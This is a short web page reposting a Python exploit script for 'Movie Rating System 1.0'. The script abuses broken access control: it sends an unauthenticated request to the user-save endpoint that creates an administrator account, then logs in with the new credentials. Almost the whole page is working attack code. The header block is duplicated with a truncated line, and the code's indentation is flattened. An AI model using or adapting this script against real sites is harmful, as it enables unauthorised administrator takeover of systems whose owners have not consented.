Movie Rating System 1.0 Broken Access Control

Details
Category: Vulnerabilities
Hits: 132
# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: ht # Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows

import requests
import json

url = input('Url:')
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"

Username = "tago"
Password = "tagoletta"

reqUrl = url + "classes/Users.php?f=save"

reqHeaders = {
"Accept": "*/*",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
"Origin": url}

reqData = "------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="id" ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="firstname" Tago ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="lastname" Letta ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="username" "+Username+" ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="password" "+Password+" ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="type" 1 ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryTagmac-- "

resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)

if resp.status_code == 200:
print("Admin account created")
reqUrl = url + "classes/Login.php?f=login"

reqHeaders = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
"Origin": url
}

reqData = {"username": ""+Username+"", "password": ""+Password+""}

resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)

data = json.loads(resp.text)
status = data["status"]

if status == "success":
print("Login Successfully Username:"+ Username+" Password:"+Password)
else:
print("Exploited but not loginned")
else:
print("Not injectable")